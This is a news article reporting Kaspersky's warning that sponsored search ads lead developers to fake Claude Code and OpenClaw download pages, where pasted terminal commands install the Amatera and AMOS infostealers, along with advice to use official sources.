AI-powered coding assistants have changed how developers work. However, in the field of cybersecurity, they have also created a new playground for bad actors. Recent reports indicate that hackers are now using the popularity of tools like Claude Code and OpenClaw to distribute sophisticated data-stealing software (AKA infostealer malware). This way, they are successfully infiltrating both personal and corporate environments.
Malvertising campaign targets AI software developers
According to a recent alert from Kaspersky, the primary weapon in this campaign is “malvertising.” When developers search for terms like “Claude Code download” or “OpenClaw download,” they may encounter malicious advertisements at the top of their search results. These ads lead to websites that are nearly indistinguishable from the official pages of companies like Anthropic or OpenAI.
Traditional software uses standard installer packages (executables) to make things easier for the mainstream audience. However, many AI developer tools require copy and paste commands directly into a terminal or command prompt. This makes it much harder for even experienced users to notice when they are executing malicious code.
A tailored attack for every system
Depending on whether a user is on Windows or macOS, the fake download sites deliver a different type of “infostealer.” The latter is a category of malware designed to vacuum up sensitive information.
Those targeted on Windows often end up with Amatera. This malware is known for raiding user directories, web browsers, and cryptocurrency wallets. It works on a “Malware-as-a-Service” model, meaning it is a professional tool rented out to various criminal groups. On the other hand, Apple users are being hit with AMOS (Atomic macOS Stealer). This is a well-known threat that has been used a lot to bypass macOS security and steal private information (like passwords and account credentials).
Why the stakes are so high
This isn’t just a problem for hobbyists. Professional developers often have access to private API keys, sensitive business data, and proprietary source code. Kaspersky’s cybersecurity expert Vladimir Gursky says that an infection on a developer’s computer can put all of the company’s active projects and private records at risk.
To stay safe, experts recommend skipping the sponsored ads in search results and heading directly to official documentation or verified repositories like GitHub. In an era where “copy-pasting” is a standard part of the workflow, verifying the source of that code has never been more critical.
The post Fake Claude Code & OpenClaw AI Tools Delivering Data-Stealing Malware to Developers appeared first on Android Headlines.
